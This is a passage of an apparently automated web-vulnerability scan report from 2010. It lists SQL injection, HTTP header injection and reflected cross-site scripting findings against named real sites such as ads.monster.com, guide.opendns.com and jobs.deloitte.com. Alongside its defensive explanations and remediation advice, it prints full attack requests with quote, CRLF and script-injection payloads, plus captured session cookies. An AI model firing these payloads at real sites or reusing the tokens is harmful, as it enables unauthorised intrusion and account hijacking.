GET /event.ng/Type''=click&FlightID=374308&AdID=456354&TargetID=73789&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=33349,38779,39959,39962,42970,49715,53574,54687,55561,55882,61588,62430,62432,66646,67259,67765,67994,68022,68315,68924,69493,69624,70081,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,73789,106821&Values=77,85,94,211,412,1053,1435,6027,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/www.goodlifefitness.monstermediaworks.ca/ HTTP/1.1
Host: ads.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 2
HTTP/1.1 302 Found
Connection: close
Date: Fri, 26 Nov 2010 19:32:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-control: no-cache
Pragma: max-age=0
Location: http://www.goodlifefitness.monstermediaworks.ca/
Content-type: text/html
Content-length: 0
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /event.ng/Type'=click&FlightID=391895&AdID=478286&TargetID=100459&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=3029,33349,38779,39959,39962,42970,49427,49715,53574,55561,55882,61588,62430,62432,66646,67259,67765,67994,68022,68315,68924,69493,69624,70081,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,100459,106821&Values=77,85,94,211,412,668,1053,1435,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32196,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/www.west49.monstermediaworks.ca/index.html HTTP/1.1 Host: ads.monster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 1
HTTP/1.1 500 Server Error Connection: close Date: Fri, 26 Nov 2010 19:32:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html
Unable to process Ad request
Request 2
GET /event.ng/Type''=click&FlightID=391895&AdID=478286&TargetID=100459&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=3029,33349,38779,39959,39962,42970,49427,49715,53574,55561,55882,61588,62430,62432,66646,67259,67765,67994,68022,68315,68924,69493,69624,70081,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,100459,106821&Values=77,85,94,211,412,668,1053,1435,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32196,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/www.west49.monstermediaworks.ca/index.html HTTP/1.1 Host: ads.monster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 2
HTTP/1.1 302 Found Connection: close Date: Fri, 26 Nov 2010 19:32:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-control: no-cache Pragma: max-age=0 Location: http://www.west49.monstermediaworks.ca/index.html Content-type: text/html Content-length: 0
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /event.ng/Type'=click&FlightID=391909&AdID=478329&TargetID=129657&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=3029,33349,38779,39959,39962,42970,49536,49715,53574,55561,55882,61588,62430,62432,66646,67259,67765,67994,68022,68315,68924,69493,69624,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,129657,115556&Values=77,85,94,211,412,1053,1435,4719,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/jobsearch.monster.ca/search.aspx HTTP/1.1 Host: ads.monster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 1
HTTP/1.1 500 Server Error Connection: close Date: Fri, 26 Nov 2010 19:26:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html
Unable to process Ad request
Request 2
GET /event.ng/Type''=click&FlightID=391909&AdID=478329&TargetID=129657&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=3029,33349,38779,39959,39962,42970,49536,49715,53574,55561,55882,61588,62430,62432,66646,67259,67765,67994,68022,68315,68924,69493,69624,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,129657,115556&Values=77,85,94,211,412,1053,1435,4719,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/jobsearch.monster.ca/search.aspx HTTP/1.1 Host: ads.monster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 2
HTTP/1.1 302 Found Connection: close Date: Fri, 26 Nov 2010 19:26:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-control: no-cache Pragma: max-age=0 Location: http://jobsearch.monster.ca/search.aspx Content-type: text/html Content-length: 0
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /event.ng/Type'=click&FlightID=393979&AdID=480660&TargetID=93538&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=18061,33349,38779,39959,39962,42970,49533,49715,53574,55561,55882,61588,62430,62432,66646,67259,67765,67994,68022,68315,68924,69493,69624,70081,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,93538,106821&Values=77,85,94,211,412,1004,1053,1435,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/www.scotiabank.com/cda/content/0,1608,CID13424_LIDen,00.html HTTP/1.1 Host: ads.monster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 1
HTTP/1.1 500 Server Error Connection: close Date: Fri, 26 Nov 2010 19:26:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html
Unable to process Ad request
Request 2
GET /event.ng/Type''=click&FlightID=393979&AdID=480660&TargetID=93538&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=18061,33349,38779,39959,39962,42970,49533,49715,53574,55561,55882,61588,62430,62432,66646,67259,67765,67994,68022,68315,68924,69493,69624,70081,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,93538,106821&Values=77,85,94,211,412,1004,1053,1435,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/www.scotiabank.com/cda/content/0,1608,CID13424_LIDen,00.html HTTP/1.1 Host: ads.monster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 2
HTTP/1.1 302 Found Connection: close Date: Fri, 26 Nov 2010 19:26:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-control: no-cache Pragma: max-age=0 Location: http://www.scotiabank.com/cda/content/0,1608,CID13424_LIDen,00.html Content-type: text/html Content-length: 0
2. HTTP header injection
There are 2 instances of this issue:
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
2.1. http://affiliates.yellowpages.ca/clicklog.do [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://affiliates.yellowpages.ca
Path:
/clicklog.do
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 32ab0%0d%0abbc1ec17ef9 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /clicklog.do?32ab0%0d%0abbc1ec17ef9=1 HTTP/1.1 Host: affiliates.yellowpages.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=A578A9D0914694D50184F33656E49039;
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 26 Nov 2010 19:25:58 GMT Server: Apache Location: http://www.yellowpages.ca/search/?32ab0 bbc1ec17ef9=1 Content-Language: en Content-Length: 0 Connection: close Content-Type: text/html;charset=UTF-8
The value of REST URL parameter 4 is copied into the Location response header. The payload b6cfb%0d%0a556a658f8ad was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /quotes/monster-worldwide-inc/mww/b6cfb%0d%0a556a658f8ad HTTP/1.1 Host: finance.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
3.1. http://guide.opendns.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://guide.opendns.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbe3c"><script>alert(1)</script>4aa95d6be0b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bbe3c\"><script>alert(1)</script>4aa95d6be0b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?url=www%2Ecemanitoba%2Ecom&servfail&bbe3c"><script>alert(1)</script>4aa95d6be0b=1 HTTP/1.1 Host: guide.opendns.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmx=207386316.00012306182230551517:3:1; __utmxx=207386316.00012306182230551517:1774337:2592000; __utmz=207386316.1290264528.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207386316.633541220.1290264528.1290264528.1290264528.1; OPENDNS_ACCOUNT=05ac4ddebab905eed8c88999fa18bb80; OUN=m7PsKwIJcKYMvq1Mcmca8ErKsy7gUMliFZtnhIcTeYEfDFi%2FLKrtpFf%2FnhOY7xPYbwM7oqMT0lRSv6jNwyns7IGjxJG4T5kWvFRZCZS51akAp0EDEXguqEV%2Fa%2BhBQG7c5OQqfjcWJJBMU71JluOvBvv3gVCVfwdG; t=0-1298937600; LPUID=46e52ed1-9c3b-c374-31b5-d84715b8ceb4; __qca=P0-2135470522-1290702286339; fpc10002134856462=bmVcHWxK|U0QMKvOKaa|fses10002134856462=|U0QMKvOKaa|bmVcHWxK|fvis10002134856462=ZT1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkYlM0YmZj1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkZtYWluJTNGdXJsJTNEd2F0ZXJsb29ra2lvc2suY29tJmI9T3BlbkROUw==|8s7Y07781s|8s7Y07781s|8s7Y07781s|8|8s7Y07781s|8s7Y07781s
3.2. http://guide.opendns.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://guide.opendns.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 835bf"><script>alert(1)</script>934ea414490 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 835bf\"><script>alert(1)</script>934ea414490 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?url=www%2Ecemanitoba%2Ecom&servfail&835bf"><script>alert(1)</script>934ea414490=1 HTTP/1.1 Host: guide.opendns.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmx=207386316.00012306182230551517:3:1; __utmxx=207386316.00012306182230551517:1774337:2592000; __utmz=207386316.1290264528.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207386316.633541220.1290264528.1290264528.1290264528.1; OPENDNS_ACCOUNT=05ac4ddebab905eed8c88999fa18bb80; OUN=m7PsKwIJcKYMvq1Mcmca8ErKsy7gUMliFZtnhIcTeYEfDFi%2FLKrtpFf%2FnhOY7xPYbwM7oqMT0lRSv6jNwyns7IGjxJG4T5kWvFRZCZS51akAp0EDEXguqEV%2Fa%2BhBQG7c5OQqfjcWJJBMU71JluOvBvv3gVCVfwdG; t=0-1298937600; LPUID=46e52ed1-9c3b-c374-31b5-d84715b8ceb4; __qca=P0-2135470522-1290702286339; fpc10002134856462=bmVcHWxK|U0QMKvOKaa|fses10002134856462=|U0QMKvOKaa|bmVcHWxK|fvis10002134856462=ZT1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkYlM0YmZj1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkZtYWluJTNGdXJsJTNEd2F0ZXJsb29ra2lvc2suY29tJmI9T3BlbkROUw==|8s7Y07781s|8s7Y07781s|8s7Y07781s|8|8s7Y07781s|8s7Y07781s
The value of the servfail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6a01"><script>alert(1)</script>4921e725b90 was submitted in the servfail parameter. This input was echoed as d6a01\"><script>alert(1)</script>4921e725b90 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?url=www%2Ecemanitoba%2Ecom&servfaild6a01"><script>alert(1)</script>4921e725b90 HTTP/1.1 Host: guide.opendns.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmx=207386316.00012306182230551517:3:1; __utmxx=207386316.00012306182230551517:1774337:2592000; __utmz=207386316.1290264528.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207386316.633541220.1290264528.1290264528.1290264528.1; OPENDNS_ACCOUNT=05ac4ddebab905eed8c88999fa18bb80; OUN=m7PsKwIJcKYMvq1Mcmca8ErKsy7gUMliFZtnhIcTeYEfDFi%2FLKrtpFf%2FnhOY7xPYbwM7oqMT0lRSv6jNwyns7IGjxJG4T5kWvFRZCZS51akAp0EDEXguqEV%2Fa%2BhBQG7c5OQqfjcWJJBMU71JluOvBvv3gVCVfwdG; t=0-1298937600; LPUID=46e52ed1-9c3b-c374-31b5-d84715b8ceb4; __qca=P0-2135470522-1290702286339; fpc10002134856462=bmVcHWxK|U0QMKvOKaa|fses10002134856462=|U0QMKvOKaa|bmVcHWxK|fvis10002134856462=ZT1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkYlM0YmZj1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkZtYWluJTNGdXJsJTNEd2F0ZXJsb29ra2lvc2suY29tJmI9T3BlbkROUw==|8s7Y07781s|8s7Y07781s|8s7Y07781s|8|8s7Y07781s|8s7Y07781s
The value of the servfail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1027b"><script>alert(1)</script>127dc6449b8 was submitted in the servfail parameter. This input was echoed as 1027b\"><script>alert(1)</script>127dc6449b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?url=www%2Ecemanitoba%2Ecom&servfail1027b"><script>alert(1)</script>127dc6449b8 HTTP/1.1 Host: guide.opendns.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmx=207386316.00012306182230551517:3:1; __utmxx=207386316.00012306182230551517:1774337:2592000; __utmz=207386316.1290264528.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207386316.633541220.1290264528.1290264528.1290264528.1; OPENDNS_ACCOUNT=05ac4ddebab905eed8c88999fa18bb80; OUN=m7PsKwIJcKYMvq1Mcmca8ErKsy7gUMliFZtnhIcTeYEfDFi%2FLKrtpFf%2FnhOY7xPYbwM7oqMT0lRSv6jNwyns7IGjxJG4T5kWvFRZCZS51akAp0EDEXguqEV%2Fa%2BhBQG7c5OQqfjcWJJBMU71JluOvBvv3gVCVfwdG; t=0-1298937600; LPUID=46e52ed1-9c3b-c374-31b5-d84715b8ceb4; __qca=P0-2135470522-1290702286339; fpc10002134856462=bmVcHWxK|U0QMKvOKaa|fses10002134856462=|U0QMKvOKaa|bmVcHWxK|fvis10002134856462=ZT1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkYlM0YmZj1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkZtYWluJTNGdXJsJTNEd2F0ZXJsb29ra2lvc2suY29tJmI9T3BlbkROUw==|8s7Y07781s|8s7Y07781s|8s7Y07781s|8|8s7Y07781s|8s7Y07781s
3.5. http://jobs.deloitte.com/ca/greater-vancouver/management-consulting-jobs [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://jobs.deloitte.com
Path:
/ca/greater-vancouver/management-consulting-jobs
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d577'-alert(1)-'b94ddde0973 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ca/greater-vancouver/management-consulting-jobs?6d577'-alert(1)-'b94ddde0973=1 HTTP/1.1 Host: jobs.deloitte.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 26 Nov 2010 19:39:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: apstr=; expires=Sat, 26-Nov-2011 19:39:02 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 30404
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head id="He ...[SNIP]...
3.6. http://js.worthathousandwords.com/IA.jsh [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://js.worthathousandwords.com
Path:
/IA.jsh
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71225'%3balert(1)//d6624635fd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 71225';alert(1)//d6624635fd2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /IA.jsh?71225'%3balert(1)//d6624635fd2=1 HTTP/1.1 Host: js.worthathousandwords.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Cache-Control: private, max-age=7200 Date: Fri, 26 Nov 2010 19:36:12 GMT Content-Length: 266 Connection: close
var callID = 'http://js.worthathousandwords.com/IA.jsh?71225';alert(1)//d6624635fd2=1'; document.write('<div style="font-size:28px;" ><b>PLEASE REMOVE THIS IMAGE CALL </b>'); document.write(callID) ...[SNIP]...
3.7. http://monsterca.careerperfect.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://monsterca.careerperfect.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80c2f"><script>alert(1)</script>495af72082d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?80c2f"><script>alert(1)</script>495af72082d=1 HTTP/1.1 Host: monsterca.careerperfect.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aea9c'%3b57e13698d9b was submitted in the REST URL parameter 5. This input was echoed as aea9c';57e13698d9b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cgi-bin/WebObjects/ShopToIt.woa/wa/productSearchaea9c'%3b57e13698d9b HTTP/1.1 Host: shop.listingsca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6abb3'%3b94cfe8ba3bc was submitted in the REST URL parameter 4. This input was echoed as 6abb3';94cfe8ba3bc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
